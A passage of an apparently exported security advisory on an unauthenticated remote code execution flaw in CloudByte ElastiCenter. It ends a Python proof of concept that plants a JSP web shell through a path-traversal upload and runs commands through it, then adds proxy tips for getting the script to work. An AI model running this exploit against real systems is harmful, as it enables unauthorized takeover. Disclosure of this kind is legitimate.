id=\"crayon-5b7f32dbf0538609791845-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-37\"><span class=\"crayon-v\">xurl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-38\"><span class=\"crayon-v\">xcmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-40\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">session<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-41\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-42\"><span class=\"crayon-v\">files<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;fileToUpload&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;..\/..\/images\/v2.jsp&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">jspshell<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;mainui&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;mainui&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-43\"><span class=\"crayon-v\">g<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xurl<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">UPPATH<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">files<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">files<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">verify<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-45\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xurl<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;\/client\/images\/v2.jsp?cmd=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xcmd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">verify<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-46\"><span class=\"crayon-e\">print <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0048 seconds] -->  <\/p>\n<p>On some latest linux versions ( debian\/kali 2.0) you may run into ssl issues:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc2.png\" data-slb-active=\"1\" data-slb-asset=\"1356336615\" data-slb-internal=\"0\" data-slb-group=\"3737\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-3740\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc2-300x74.png\" alt=\"\" width=\"794\" height=\"196\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc2-300x74.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc2.png 970w\" sizes=\"auto, (max-width: 794px) 100vw, 794px\" \/><\/a><\/p>\n<p>In order to overcome this issue, run your favorite http proxy ( We use burpsuite on kali 2.0 )<br \/> Leave the defaults for burpsuit ( Listening on 127.0.0.1:8080 ), and set the proxy via the environment variables.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc3.png\" data-slb-active=\"1\" data-slb-asset=\"865060411\" data-slb-internal=\"0\" data-slb-group=\"3737\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-3742\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc3-300x117.png\" alt=\"\" width=\"613\" height=\"239\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc3-300x117.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc3.png 594w\" sizes=\"auto, (max-width: 613px) 100vw, 613px\" \/><\/a><\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3737\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc1-300x58.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 23 Aug 2018 10:57:33 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two vulnerabilities found in ElastiCenter, ElastiStor&#8217;s management console, File Injection that leads to unauthenticated remote code execution. ElastiCenter is the centralized management tool that you use to configure, monitor, manage, and deploy the services provided by CloudByte ElastiStor. ElastiCenter lets you: Use the Graphical User Interface to manage the &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3737\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 CloudByte ElastiStor OS Unauthenticated Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,12136],"class_list":["post-13181","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13181","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13181"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13181\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13181"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13181"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13181"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}